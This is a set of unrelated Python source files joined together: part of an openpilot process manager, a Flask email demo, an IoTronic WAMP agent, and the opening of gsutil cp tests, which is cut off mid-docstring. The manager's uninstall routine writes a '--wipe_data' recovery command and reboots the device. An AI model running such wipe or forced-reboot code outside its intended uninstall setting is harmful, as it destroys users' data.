"proclogd": ("selfdrive/proclogd", ["./proclogd"]),
"boardd": ("selfdrive/boardd", ["./boardd"]), # not used directly
"pandad": "selfdrive.pandad",
"ui": ("selfdrive/ui", ["./ui"]),
"calibrationd": "selfdrive.locationd.calibrationd",
"paramsd": "selfdrive.locationd.paramsd",
"camerad": ("selfdrive/camerad", ["./camerad"]),
"sensord": ("selfdrive/sensord", ["./sensord"]),
"clocksd": ("selfdrive/clocksd", ["./clocksd"]),
"gpsd": ("selfdrive/sensord", ["./gpsd"]),
"updated": "selfdrive.updated",
"dmonitoringmodeld": ("selfdrive/modeld", ["./dmonitoringmodeld"]),
"modeld": ("selfdrive/modeld", ["./modeld"]),
"rtshield": "selfdrive.rtshield",
}
daemon_processes = {
"manage_athenad": ("selfdrive.athena.manage_athenad", "AthenadPid"),
}
running: Dict[str, Process] = {}
def get_running():
return running
# due to qualcomm kernel bugs SIGKILLing camerad sometimes causes page table corruption
unkillable_processes = ['camerad']
# processes to end with SIGINT instead of SIGTERM
interrupt_processes: List[str] = []
# processes to end with SIGKILL instead of SIGTERM
kill_processes = ['sensord']
persistent_processes = [
'thermald',
'logmessaged',
'ui',
'uploader',
'deleter',
]
if not PC:
persistent_processes += [
'updated',
'logcatd',
'tombstoned',
'sensord',
]
car_started_processes = [
'controlsd',
'plannerd',
'loggerd',
'radard',
'calibrationd',
'paramsd',
'camerad',
'proclogd',
'locationd',
'clocksd',
]
driver_view_processes = [
'camerad',
'dmonitoringd',
'dmonitoringmodeld'
]
if WEBCAM:
car_started_processes += [
'dmonitoringd',
'dmonitoringmodeld',
]
if not PC:
car_started_processes += [
'ubloxd',
'dmonitoringd',
'dmonitoringmodeld',
]
if ANDROID:
car_started_processes += [
'gpsd',
'rtshield',
]
# starting dmonitoringmodeld when modeld is initializing can sometimes
# result in a weird snpe state where dmon constantly uses more cpu than normal.
car_started_processes += ['modeld']
def register_managed_process(name, desc, car_started=False):
global managed_processes, car_started_processes, persistent_processes
print("registering %s" % name)
managed_processes[name] = desc
if car_started:
car_started_processes.append(name)
else:
persistent_processes.append(name)
# ****************** process management functions ******************
def nativelauncher(pargs, cwd):
# exec the process
os.chdir(cwd)
# because when extracted from pex zips permissions get lost -_-
os.chmod(pargs[0], 0o700)
os.execvp(pargs[0], pargs)
def start_managed_process(name):
if name in running or name not in managed_processes:
return
proc = managed_processes[name]
if isinstance(proc, str):
cloudlog.info("starting python %s" % proc)
running[name] = Process(name=name, target=launcher, args=(proc,))
else:
pdir, pargs = proc
cwd = os.path.join(BASEDIR, pdir)
cloudlog.info("starting process %s" % name)
running[name] = Process(name=name, target=nativelauncher, args=(pargs, cwd))
running[name].start()
def start_daemon_process(name):
params = Params()
proc, pid_param = daemon_processes[name]
pid = params.get(pid_param, encoding='utf-8')
if pid is not None:
try:
os.kill(int(pid), 0)
with open(f'/proc/{pid}/cmdline') as f:
if proc in f.read():
# daemon is running
return
except (OSError, FileNotFoundError):
# process is dead
pass
cloudlog.info("starting daemon %s" % name)
proc = subprocess.Popen(['python', '-m', proc], # pylint: disable=subprocess-popen-preexec-fn
stdin=open('/dev/null', 'r'),
stdout=open('/dev/null', 'w'),
stderr=open('/dev/null', 'w'),
preexec_fn=os.setpgrp)
params.put(pid_param, str(proc.pid))
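# Hedged note: the liveness check above only treats the daemon as running when both
# os.kill(pid, 0) succeeds (the pid exists) and the recorded module name appears in
# /proc/<pid>/cmdline, which guards against a recycled pid belonging to some other process.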
def prepare_managed_process(p):
proc = managed_processes[p]
if isinstance(proc, str):
# import this python
cloudlog.info("preimporting %s" % proc)
importlib.import_module(proc)
elif os.path.isfile(os.path.join(BASEDIR, proc[0], "Makefile")):
# build this process
cloudlog.info("building %s" % (proc,))
try:
subprocess.check_call(["make", "-j4"], cwd=os.path.join(BASEDIR, proc[0]))
except subprocess.CalledProcessError:
# make clean if the build failed
cloudlog.warning("building %s failed, make clean" % (proc, ))
subprocess.check_call(["make", "clean"], cwd=os.path.join(BASEDIR, proc[0]))
subprocess.check_call(["make", "-j4"], cwd=os.path.join(BASEDIR, proc[0]))
def join_process(process, timeout):
# Process().join(timeout) will hang due to a python 3 bug: https://bugs.python.org/issue28382
# We have to poll the exitcode instead
t = time.time()
while time.time() - t < timeout and process.exitcode is None:
time.sleep(0.001)
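# Hedged usage sketch (hypothetical process name): join_process(running['ui'], 5) polls
# Process.exitcode in 1 ms steps for up to 5 seconds instead of calling Process.join(timeout),
# working around the join() hang referenced in the comment above.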
def kill_managed_process(name):
if name not in running or name not in managed_processes:
return
cloudlog.info("killing %s" % name)
if running[name].exitcode is None:
if name in interrupt_processes:
os.kill(running[name].pid, signal.SIGINT)
elif name in kill_processes:
os.kill(running[name].pid, signal.SIGKILL)
else:
running[name].terminate()
join_process(running[name], 5)
if running[name].exitcode is None:
if name in unkillable_processes:
cloudlog.critical("unkillable process %s failed to exit! rebooting in 15 if it doesn't die" % name)
join_process(running[name], 15)
if running[name].exitcode is None:
cloudlog.critical("unkillable process %s failed to die!" % name)
# TODO: Use method from HARDWARE
if ANDROID:
cloudlog.critical("FORCE REBOOTING PHONE!")
os.system("date >> /sdcard/unkillable_reboot")
os.system("reboot")
raise RuntimeError
else:
cloudlog.info("killing %s with SIGKILL" % name)
os.kill(running[name].pid, signal.SIGKILL)
running[name].join()
cloudlog.info("%s is dead with %d" % (name, running[name].exitcode))
del running[name]
def cleanup_all_processes(signal, frame):
cloudlog.info("caught ctrl-c %s %s" % (signal, frame))
if ANDROID:
pm_apply_packages('disable')
for name in list(running.keys()):
kill_managed_process(name)
cloudlog.info("everything is dead")
def send_managed_process_signal(name, sig):
if name not in running or name not in managed_processes:
return
cloudlog.info(f"sending signal {sig} to {name}")
os.kill(running[name].pid, sig)
# ****************** run loop ******************
def manager_init(should_register=True):
if should_register:
reg_res = register()
if reg_res:
dongle_id = reg_res
else:
raise Exception("server registration failed")
else:
dongle_id = "c"*16
# set dongle id
cloudlog.info("dongle id is " + dongle_id)
os.environ['DONGLE_ID'] = dongle_id
cloudlog.info("dirty is %d" % dirty)
if not dirty:
os.environ['CLEAN'] = '1'
cloudlog.bind_global(dongle_id=dongle_id, version=version, dirty=dirty, is_eon=True)
crash.bind_user(id=dongle_id)
crash.bind_extra(version=version, dirty=dirty, is_eon=True)
os.umask(0)
try:
os.mkdir(ROOT, 0o777)
except OSError:
pass
# ensure shared libraries are readable by apks
if ANDROID:
os.chmod(BASEDIR, 0o755)
os.chmod(os.path.join(BASEDIR, "cereal"), 0o755)
os.chmod(os.path.join(BASEDIR, "cereal", "libmessaging_shared.so"), 0o755)
def manager_thread():
# now loop
thermal_sock = messaging.sub_sock('thermal')
cloudlog.info("manager start")
cloudlog.info({"environ": os.environ})
# save boot log
subprocess.call(["./loggerd", "--bootlog"], cwd=os.path.join(BASEDIR, "selfdrive/loggerd"))
params = Params()
# start daemon processes
for p in daemon_processes:
start_daemon_process(p)
# start persistent processes
for p in persistent_processes:
start_managed_process(p)
# start offroad
if ANDROID:
pm_apply_packages('enable')
start_offroad()
if os.getenv("NOBOARD") is None:
start_managed_process("pandad")
if os.getenv("BLOCK") is not None:
for k in os.getenv("BLOCK").split(","):
del managed_processes[k]
started_prev = False
logger_dead = False
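  # Main loop: block on thermal messages and start/stop the car_started
  # processes based on ignition state (msg.thermal.started), driver view, and
  # free disk space (loggerd is stopped when free space drops below 5%).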
while 1:
msg = messaging.recv_sock(thermal_sock, wait=True)
if msg.thermal.freeSpace < 0.05:
logger_dead = True
if msg.thermal.started:
for p in car_started_processes:
if p == "loggerd" and logger_dead:
kill_managed_process(p)
else:
start_managed_process(p)
else:
logger_dead = False
driver_view = params.get("IsDriverViewEnabled") == b"1"
# TODO: refactor how manager manages processes
for p in reversed(car_started_processes):
if p not in driver_view_processes or not driver_view:
kill_managed_process(p)
for p in driver_view_processes:
if driver_view:
start_managed_process(p)
else:
kill_managed_process(p)
# trigger an update after going offroad
if started_prev:
send_managed_process_signal("updated", signal.SIGHUP)
started_prev = msg.thermal.started
# check the status of all processes, did any of them die?
running_list = ["%s%s\u001b[0m" % ("\u001b[32m" if running[p].is_alive() else "\u001b[31m", p) for p in running]
cloudlog.debug(' '.join(running_list))
# Exit main loop when uninstall is needed
if params.get("DoUninstall", encoding='utf8') == "1":
break
def manager_prepare(spinner=None):
# build all processes
os.chdir(os.path.dirname(os.path.abspath(__file__)))
  # Spinner progress resumes at 70% here (the build phase uses the last 30%), unless prebuilt, in which case it spans the full 0-100%.
total = 100.0 if prebuilt else 30.0
for i, p in enumerate(managed_processes):
if spinner is not None:
spinner.update("%d" % ((100.0 - total) + total * (i + 1) / len(managed_processes),))
prepare_managed_process(p)
def uninstall():
cloudlog.warning("uninstalling")
with open('/cache/recovery/command', 'w') as f:
f.write('--wipe_data\n')
# IPowerManager.reboot(confirm=false, reason="recovery", wait=true)
HARDWARE.reboot(reason="recovery")
def main():
if ANDROID:
# the flippening!
os.system('LD_LIBRARY_PATH="" content insert --uri content://settings/system --bind name:s:user_rotation --bind value:i:1')
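    # user_rotation value 1 appears to correspond to a 90 degree (landscape)
    # rotation in Android's Surface rotation constants.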
# disable bluetooth
os.system('service call bluetooth_manager 8')
params = Params()
params.manager_start()
default_params = [
("CommunityFeaturesToggle", "0"),
("CompletedTrainingVersion", "0"),
("IsRHD", "0"),
("IsMetric", "0"),
("RecordFront", "0"),
("HasAcceptedTerms", "0"),
("HasCompletedSetup", "0"),
("IsUploadRawEnabled", "1"),
("IsLdwEnabled", "1"),
("LastUpdateTime", datetime.datetime.utcnow().isoformat().encode('utf8')),
("OpenpilotEnabledToggle", "1"),
("LaneChangeEnabled", "1"),
("IsDriverViewEnabled", "0"),
]
# set unset params
for k, v in default_params:
if params.get(k) is None:
params.put(k, v)
# is this chffrplus?
if os.getenv("PASSIVE") is not None:
params.put("Passive", str(int(os.getenv("PASSIVE"))))
if params.get("Passive") is None:
raise Exception("Passive must be set to continue")
if ANDROID:
update_apks()
manager_init()
manager_prepare(spinner)
spinner.close()
if os.getenv("PREPAREONLY") is not None:
return
# SystemExit on sigterm
signal.signal(signal.SIGTERM, lambda signum, frame: sys.exit(1))
try:
manager_thread()
except Exception:
traceback.print_exc()
crash.capture_exception()
finally:
cleanup_all_processes(None, None)
if params.get("DoUninstall", encoding='utf8') == "1":
uninstall()
if __name__ == "__main__":
try:
main()
except Exception:
add_logentries_handler(cloudlog)
cloudlog.exception("Manager failed to start")
    # Show last 3 stack frames of the traceback
error = traceback.format_exc(-3)
error = "Manager failed to start\n \n" + error
with TextWindow(error) as t:
t.wait_for_exit()
raise
# manual exit because we are forked
sys.exit(0)
|
app.py
|
# -*- coding: utf-8 -*-
"""
:author: Grey Li (李辉)
:url: http://greyli.com
:copyright: © 2018 Grey Li
:license: MIT, see LICENSE for more details.
"""
import os
from threading import Thread
from settings import config
import sendgrid
from sendgrid.helpers.mail import Email as SGEmail, Content, Mail as SGMail
from flask_mail import Mail, Message
from flask_wtf import FlaskForm
from wtforms import StringField, TextAreaField, SubmitField
from wtforms.validators import DataRequired, Email
from flask import Flask, flash, redirect, url_for, render_template, request
app = Flask(__name__)
config_name = os.getenv('FLASK_CONFIG', 'development')
app.config.from_object(config[config_name])
app.jinja_env.trim_blocks = True
app.jinja_env.lstrip_blocks = True
app.config.update(
SECRET_KEY=app.config['SECRET_KEY'],
MAIL_SERVER=app.config['MAIL_SERVER'],
MAIL_PORT=465,
MAIL_USE_SSL=True,
MAIL_USERNAME=app.config['MAIL_USERNAME'],
MAIL_PASSWORD=app.config['MAIL_PASSWORD'],
MAIL_DEFAULT_SENDER=app.config['MAIL_DEFAULT_SENDER']
)
mail = Mail(app)
# send over SMTP
def send_smtp_mail(subject, to, body):
message = Message(subject, recipients=[to], body=body)
mail.send(message)
# send over SendGrid Web API
def send_api_mail(subject, to, body):
    # alternatively, the API key could be read from app config: app.config['SENDGRID_API_KEY']
sg = sendgrid.SendGridAPIClient(apikey=os.environ.get('SENDGRID_API_KEY'))
from_email = SGEmail('Grey Li <noreply@helloflask.com>')
to_email = SGEmail(to)
content = Content("text/plain", body)
email = SGMail(from_email, subject, to_email, content)
sg.client.mail.send.post(request_body=email.get())
# send email asynchronously
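# The app object is handed to the worker thread explicitly because mail.send()
# needs an application context, which is not automatically available in a
# thread created outside the request.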
def _send_async_mail(app, message):
with app.app_context():
mail.send(message)
def send_async_mail(subject, to, body):
    # app = current_app._get_current_object()  # when using an app factory (i.e. create_app()), get the real app object like this
message = Message(subject, recipients=[to], body=body)
thr = Thread(target=_send_async_mail, args=[app, message])
thr.start()
return thr
# send email with HTML body
def send_subscribe_mail(subject, to, **kwargs):
message = Message(subject, recipients=[to], sender='Flask Weekly <%s>' % os.getenv('MAIL_USERNAME'))
message.body = render_template('emails/subscribe.txt', **kwargs)
message.html = render_template('emails/subscribe.html', **kwargs)
mail.send(message)
class EmailForm(FlaskForm):
to = StringField('To', validators=[DataRequired(), Email()])
subject = StringField('Subject', validators=[DataRequired()])
body = TextAreaField('Body', validators=[DataRequired()])
submit_smtp = SubmitField('Send with SMTP')
submit_api = SubmitField('Send with SendGrid API')
submit_async = SubmitField('Send with SMTP asynchronously')
class SubscribeForm(FlaskForm):
name = StringField('Name', validators=[DataRequired()])
email = StringField('Email', validators=[DataRequired(), Email()])
submit = SubmitField('Subscribe')
@app.route('/', methods=['GET', 'POST'])
def index():
form = EmailForm()
if form.validate_on_submit():
to = form.to.data
subject = form.subject.data
body = form.body.data
if form.submit_smtp.data:
send_smtp_mail(subject, to, body)
method = request.form.get('submit_smtp')
elif form.submit_api.data:
send_api_mail(subject, to, body)
method = request.form.get('submit_api')
else:
send_async_mail(subject, to, body)
method = request.form.get('submit_async')
flash('Email sent %s! Check your inbox.' % ' '.join(method.split()[1:]))
return redirect(url_for('index'))
form.subject.data = 'Hello, World!'
form.body.data = 'Across the Great Wall we can reach every corner in the world.'
return render_template('index.html', form=form)
@app.route('/subscribe', methods=['GET', 'POST'])
def subscribe():
form = SubscribeForm()
if form.validate_on_submit():
name = form.name.data
email = form.email.data
send_subscribe_mail('Subscribe Success!', email, name=name)
        flash('Confirmation email has been sent! Check your inbox.')
return redirect(url_for('subscribe'))
return render_template('subscribe.html', form=form)
@app.route('/unsubscribe')
def unsubscribe():
flash('Want to unsubscribe? No way...')
return redirect(url_for('subscribe'))
|
agent.py
|
# Copyright 2017 MDSLAB - University of Messina
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from autobahn.twisted import wamp
from autobahn.twisted import websocket
from autobahn.wamp import types
from twisted.internet.defer import inlineCallbacks
from iotronic.common import exception
from iotronic.common.i18n import _LI
from iotronic.common.i18n import _LW
from iotronic.db import api as dbapi
from oslo_config import cfg
from oslo_log import log as logging
import oslo_messaging
import threading
from threading import Thread
from twisted.internet.protocol import ReconnectingClientFactory
from twisted.internet import reactor
import os
import signal
LOG = logging.getLogger(__name__)
wamp_opts = [
cfg.StrOpt('wamp_transport_url',
default='ws://localhost:8181/',
help=('URL of wamp broker')),
cfg.StrOpt('wamp_realm',
default='s4t',
               help=('WAMP realm of the broker')),
cfg.BoolOpt('register_agent',
default=False,
                help=('Flag to act as the registration agent')),
cfg.IntOpt('autoPingInterval',
default=2,
help=('autoPingInterval parameter for wamp')),
cfg.IntOpt('autoPingTimeout',
default=2,
               help=('autoPingTimeout parameter for wamp')),
]
CONF = cfg.CONF
CONF.register_opts(wamp_opts, 'wamp')
shared_result = {}
wamp_session_caller = None
AGENT_HOST = None
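# wamp_request runs inside a worker thread spawned by WampEndpoint: it issues
# the WAMP call on the session, stores the success or failure result in
# shared_result keyed by the thread ident, and sets the Event so the caller can
# pick the result up.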
def wamp_request(e, kwarg, session):
id = threading.current_thread().ident
shared_result[id] = {}
shared_result[id]['result'] = None
def success(d):
shared_result[id]['result'] = d
LOG.debug("DEVICE sent: %s", str(d))
e.set()
return shared_result[id]['result']
def fail(failure):
shared_result[id]['result'] = failure
LOG.error("WAMP FAILURE: %s", str(failure))
e.set()
return shared_result[id]['result']
LOG.debug("Calling %s...", kwarg['wamp_rpc_call'])
d = session.wamp_session.call(wamp_session_caller,
kwarg['wamp_rpc_call'], *kwarg['data'])
d.addCallback(success)
d.addErrback(fail)
# OSLO ENDPOINT
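# WampEndpoint bridges AMQP and WAMP: the conductor calls
# "<agent_uuid>.s4t_invoke_wamp" over oslo.messaging and the endpoint forwards
# the call to the board through the active WAMP session.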
class WampEndpoint(object):
def __init__(self, wamp_session, agent_uuid):
self.wamp_session = wamp_session
setattr(self, agent_uuid + '.s4t_invoke_wamp', self.s4t_invoke_wamp)
def s4t_invoke_wamp(self, ctx, **kwarg):
e = threading.Event()
LOG.debug("CONDUCTOR sent me:", kwarg)
th = threading.Thread(target=wamp_request, args=(e, kwarg, self))
th.start()
e.wait()
LOG.debug("result received from wamp call: %s",
str(shared_result[th.ident]['result']))
result = shared_result[th.ident]['result']
del shared_result[th.ident]['result']
return result
class WampFrontend(wamp.ApplicationSession):
@inlineCallbacks
def onJoin(self, details):
global wamp_session_caller, AGENT_HOST
wamp_session_caller = self
import iotronic.wamp.functions as fun
self.subscribe(fun.board_on_leave, 'wamp.session.on_leave')
self.subscribe(fun.board_on_join, 'wamp.session.on_join')
try:
if CONF.wamp.register_agent:
self.register(fun.registration, u'stack4things.register')
LOG.info("I have been set as registration agent")
self.register(fun.connection,
AGENT_HOST + u'.stack4things.connection')
self.register(fun.echo,
AGENT_HOST + u'.stack4things.echo')
LOG.info("procedure registered")
except Exception as e:
LOG.error("could not register procedure: {0}".format(e))
LOG.info("WAMP session ready.")
session_l = yield self.call(u'wamp.session.list')
session_l.remove(details.session)
fun.update_sessions(session_l)
def onDisconnect(self):
LOG.info("disconnected")
class WampClientFactory(websocket.WampWebSocketClientFactory,
ReconnectingClientFactory):
maxDelay = 30
def clientConnectionFailed(self, connector, reason):
# print "reason:", reason
LOG.warning("Wamp Connection Failed.")
ReconnectingClientFactory.clientConnectionFailed(self,
connector, reason)
def clientConnectionLost(self, connector, reason):
# print "reason:", reason
LOG.warning("Wamp Connection Lost.")
ReconnectingClientFactory.clientConnectionLost(self,
connector, reason)
class RPCServer(Thread):
def __init__(self):
global AGENT_HOST
# AMQP CONFIG
endpoints = [
WampEndpoint(WampFrontend, AGENT_HOST),
]
Thread.__init__(self)
transport = oslo_messaging.get_transport(CONF)
target = oslo_messaging.Target(topic=AGENT_HOST + '.s4t_invoke_wamp',
server='server1')
self.server = oslo_messaging.get_rpc_server(transport,
target,
endpoints,
executor='threading')
def run(self):
LOG.info("Starting AMQP server... ")
self.server.start()
def stop(self):
LOG.info("Stopping AMQP server... ")
self.server.stop()
LOG.info("AMQP server stopped. ")
class WampManager(object):
def __init__(self):
component_config = types.ComponentConfig(
realm=unicode(CONF.wamp.wamp_realm))
session_factory = wamp.ApplicationSessionFactory(
config=component_config)
session_factory.session = WampFrontend
transport_factory = WampClientFactory(session_factory,
url=CONF.wamp.wamp_transport_url)
transport_factory.autoPingInterval = CONF.wamp.autoPingInterval
transport_factory.autoPingTimeout = CONF.wamp.autoPingTimeout
LOG.debug("wamp url: %s wamp realm: %s",
CONF.wamp.wamp_transport_url, CONF.wamp.wamp_realm)
websocket.connectWS(transport_factory)
def start(self):
LOG.info("Starting WAMP server...")
reactor.run()
def stop(self):
LOG.info("Stopping WAMP-agent server...")
reactor.stop()
LOG.info("WAMP server stopped.")
class WampAgent(object):
def __init__(self, host):
signal.signal(signal.SIGINT, self.stop_handler)
logging.register_options(CONF)
CONF(project='iotronic')
logging.setup(CONF, "iotronic-wamp-agent")
# to be removed asap
self.host = host
self.dbapi = dbapi.get_instance()
try:
wpa = self.dbapi.register_wampagent(
{'hostname': self.host, 'wsurl': CONF.wamp.wamp_transport_url})
except exception.WampAgentAlreadyRegistered:
LOG.warn(_LW("A wampagent with hostname %(hostname)s "
"was previously registered. Updating registration"),
{'hostname': self.host})
wpa = self.dbapi.register_wampagent(
{'hostname': self.host, 'wsurl': CONF.wamp.wamp_transport_url},
update_existing=True)
self.wampagent = wpa
self.wampagent.ragent = CONF.wamp.register_agent
self.wampagent.save()
global AGENT_HOST
AGENT_HOST = self.host
self.r = RPCServer()
self.w = WampManager()
self.r.start()
self.w.start()
def del_host(self, deregister=True):
if deregister:
try:
self.dbapi.unregister_wampagent(self.host)
LOG.info(_LI('Successfully stopped wampagent with hostname '
'%(hostname)s.'),
{'hostname': self.host})
except exception.WampAgentNotFound:
pass
else:
LOG.info(_LI('Not deregistering wampagent with hostname '
'%(hostname)s.'),
{'hostname': self.host})
def stop_handler(self, signum, frame):
self.w.stop()
self.r.stop()
self.del_host()
os._exit(0)
|
test_cp.py
|
# -*- coding: utf-8 -*-
# Copyright 2013 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Integration tests for cp command."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import ast
import base64
import binascii
import datetime
import gzip
import hashlib
import logging
import os
import pickle
import pkgutil
import random
import re
import stat
import string
import sys
import threading
from apitools.base.py import exceptions as apitools_exceptions
import boto
from boto import storage_uri
from boto.exception import ResumableTransferDisposition
from boto.exception import StorageResponseError
from boto.storage_uri import BucketStorageUri
from gslib.cloud_api import ResumableUploadStartOverException
from gslib.commands.config import DEFAULT_SLICED_OBJECT_DOWNLOAD_THRESHOLD
from gslib.cs_api_map import ApiSelector
from gslib.daisy_chain_wrapper import _DEFAULT_DOWNLOAD_CHUNK_SIZE
from gslib.discard_messages_queue import DiscardMessagesQueue
from gslib.gcs_json_api import GcsJsonApi
from gslib.parallel_tracker_file import ObjectFromTracker
from gslib.parallel_tracker_file import WriteParallelUploadTrackerFile
from gslib.project_id import PopulateProjectId
from gslib.storage_url import StorageUrlFromString
from gslib.tests.rewrite_helper import EnsureRewriteResumeCallbackHandler
from gslib.tests.rewrite_helper import HaltingRewriteCallbackHandler
from gslib.tests.rewrite_helper import RewriteHaltException
import gslib.tests.testcase as testcase
from gslib.tests.testcase.base import NotParallelizable
from gslib.tests.testcase.integration_testcase import SkipForGS
from gslib.tests.testcase.integration_testcase import SkipForS3
from gslib.tests.testcase.integration_testcase import SkipForXML
from gslib.tests.testcase.integration_testcase import SkipForJSON
from gslib.tests.util import BuildErrorRegex
from gslib.tests.util import GenerationFromURI as urigen
from gslib.tests.util import HaltingCopyCallbackHandler
from gslib.tests.util import HaltOneComponentCopyCallbackHandler
from gslib.tests.util import HAS_GS_PORT
from gslib.tests.util import HAS_S3_CREDS
from gslib.tests.util import ObjectToURI as suri
from gslib.tests.util import ORPHANED_FILE
from gslib.tests.util import POSIX_GID_ERROR
from gslib.tests.util import POSIX_INSUFFICIENT_ACCESS_ERROR
from gslib.tests.util import POSIX_MODE_ERROR
from gslib.tests.util import POSIX_UID_ERROR
from gslib.tests.util import SequentialAndParallelTransfer
from gslib.tests.util import SetBotoConfigForTest
from gslib.tests.util import TailSet
from gslib.tests.util import TEST_ENCRYPTION_KEY1
from gslib.tests.util import TEST_ENCRYPTION_KEY1_SHA256_B64
from gslib.tests.util import TEST_ENCRYPTION_KEY2
from gslib.tests.util import TEST_ENCRYPTION_KEY3
from gslib.tests.util import unittest
from gslib.third_party.storage_apitools import storage_v1_messages as apitools_messages
from gslib.tracker_file import DeleteTrackerFile
from gslib.tracker_file import GetRewriteTrackerFilePath
from gslib.tracker_file import GetSlicedDownloadTrackerFilePaths
from gslib.ui_controller import BytesToFixedWidthString
from gslib.utils import hashing_helper
from gslib.utils.boto_util import UsingCrcmodExtension
from gslib.utils.constants import START_CALLBACK_PER_BYTES
from gslib.utils.constants import UTF8
from gslib.utils.copy_helper import GetTrackerFilePath
from gslib.utils.copy_helper import PARALLEL_UPLOAD_STATIC_SALT
from gslib.utils.copy_helper import PARALLEL_UPLOAD_TEMP_NAMESPACE
from gslib.utils.copy_helper import TrackerFileType
from gslib.utils.hashing_helper import CalculateB64EncodedMd5FromContents
from gslib.utils.hashing_helper import CalculateMd5FromContents
from gslib.utils.posix_util import GID_ATTR
from gslib.utils.posix_util import MODE_ATTR
from gslib.utils.posix_util import NA_ID
from gslib.utils.posix_util import NA_MODE
from gslib.utils.posix_util import UID_ATTR
from gslib.utils.posix_util import ValidateFilePermissionAccess
from gslib.utils.posix_util import ValidatePOSIXMode
from gslib.utils.retry_util import Retry
from gslib.utils.system_util import IS_WINDOWS
from gslib.utils.text_util import get_random_ascii_chars
from gslib.utils.unit_util import EIGHT_MIB
from gslib.utils.unit_util import HumanReadableToBytes
from gslib.utils.unit_util import MakeHumanReadable
from gslib.utils.unit_util import ONE_KIB
from gslib.utils.unit_util import ONE_MIB
import six
from six.moves import http_client
from six.moves import range
from six.moves import xrange
if six.PY3:
long = int # pylint: disable=redefined-builtin,invalid-name
# These POSIX-specific variables aren't defined for Windows.
# pylint: disable=g-import-not-at-top
if not IS_WINDOWS:
from gslib.tests import util
from gslib.tests.util import DEFAULT_MODE
from gslib.tests.util import GetInvalidGid
from gslib.tests.util import GetNonPrimaryGid
from gslib.tests.util import GetPrimaryGid
from gslib.tests.util import INVALID_UID
from gslib.tests.util import USER_ID
# pylint: enable=g-import-not-at-top
def TestCpMvPOSIXBucketToLocalErrors(cls, bucket_uri, obj, tmpdir, is_cp=True):
"""Helper function for preserve_posix_errors tests in test_cp and test_mv.
Args:
cls: An instance of either TestCp or TestMv.
bucket_uri: The uri of the bucket that the object is in.
obj: The object to run the tests on.
tmpdir: The local file path to cp to.
is_cp: Whether or not the calling test suite is cp or mv.
"""
error = 'error'
# A dict of test_name: attrs_dict.
# attrs_dict holds the different attributes that we want for the object in a
# specific test.
# To minimize potential test flakes from the system's GID mapping changing
# mid-test, we use the GID-related methods that fetch GID info each time,
# rather than reusing the LazyWrapper-wrapped constants across operations.
test_params = {
'test1': {
MODE_ATTR: '333',
error: POSIX_MODE_ERROR
},
'test2': {
GID_ATTR: GetInvalidGid,
error: POSIX_GID_ERROR
},
'test3': {
GID_ATTR: GetInvalidGid,
MODE_ATTR: '420',
error: POSIX_GID_ERROR
},
'test4': {
UID_ATTR: INVALID_UID,
error: POSIX_UID_ERROR
},
'test5': {
UID_ATTR: INVALID_UID,
MODE_ATTR: '530',
error: POSIX_UID_ERROR
},
'test6': {
UID_ATTR: INVALID_UID,
GID_ATTR: GetInvalidGid,
error: POSIX_UID_ERROR
},
'test7': {
UID_ATTR: INVALID_UID,
GID_ATTR: GetInvalidGid,
MODE_ATTR: '640',
error: POSIX_UID_ERROR
},
'test8': {
UID_ATTR: INVALID_UID,
GID_ATTR: GetPrimaryGid,
error: POSIX_UID_ERROR
},
'test9': {
UID_ATTR: INVALID_UID,
GID_ATTR: GetNonPrimaryGid,
error: POSIX_UID_ERROR
},
'test10': {
UID_ATTR: INVALID_UID,
GID_ATTR: GetPrimaryGid,
MODE_ATTR: '640',
error: POSIX_UID_ERROR
},
'test11': {
UID_ATTR: INVALID_UID,
GID_ATTR: GetNonPrimaryGid,
MODE_ATTR: '640',
error: POSIX_UID_ERROR
},
'test12': {
UID_ATTR: USER_ID,
GID_ATTR: GetInvalidGid,
error: POSIX_GID_ERROR
},
'test13': {
UID_ATTR: USER_ID,
GID_ATTR: GetInvalidGid,
MODE_ATTR: '640',
error: POSIX_GID_ERROR
},
'test14': {
GID_ATTR: GetPrimaryGid,
MODE_ATTR: '240',
error: POSIX_INSUFFICIENT_ACCESS_ERROR
}
}
  # The test_name loop variable below can be used to help debug the test if
  # there is a problem.
for test_name, attrs_dict in six.iteritems(test_params):
cls.ClearPOSIXMetadata(obj)
# Attributes default to None if they are not in attrs_dict; some attrs are
# functions or LazyWrapper objects that should be called.
uid = attrs_dict.get(UID_ATTR)
if uid is not None and callable(uid):
uid = uid()
gid = attrs_dict.get(GID_ATTR)
if gid is not None and callable(gid):
gid = gid()
mode = attrs_dict.get(MODE_ATTR)
cls.SetPOSIXMetadata(cls.default_provider,
bucket_uri.bucket_name,
obj.object_name,
uid=uid,
gid=gid,
mode=mode)
stderr = cls.RunGsUtil([
'cp' if is_cp else 'mv', '-P',
suri(bucket_uri, obj.object_name), tmpdir
],
expected_status=1,
return_stderr=True)
cls.assertIn(
ORPHANED_FILE, stderr,
'Error during test "%s": %s not found in stderr:\n%s' %
(test_name, ORPHANED_FILE, stderr))
error_regex = BuildErrorRegex(obj, attrs_dict.get(error))
cls.assertTrue(
error_regex.search(stderr),
'Test %s did not match expected error; could not find a match for '
'%s\n\nin stderr:\n%s' % (test_name, error_regex.pattern, stderr))
listing1 = TailSet(suri(bucket_uri), cls.FlatListBucket(bucket_uri))
listing2 = TailSet(tmpdir, cls.FlatListDir(tmpdir))
# Bucket should have un-altered content.
cls.assertEquals(listing1, set(['/%s' % obj.object_name]))
# Dir should have un-altered content.
cls.assertEquals(listing2, set(['']))
def TestCpMvPOSIXBucketToLocalNoErrors(cls, bucket_uri, tmpdir, is_cp=True):
"""Helper function for preserve_posix_no_errors tests in test_cp and test_mv.
Args:
cls: An instance of either TestCp or TestMv.
bucket_uri: The uri of the bucket that the object is in.
tmpdir: The local file path to cp to.
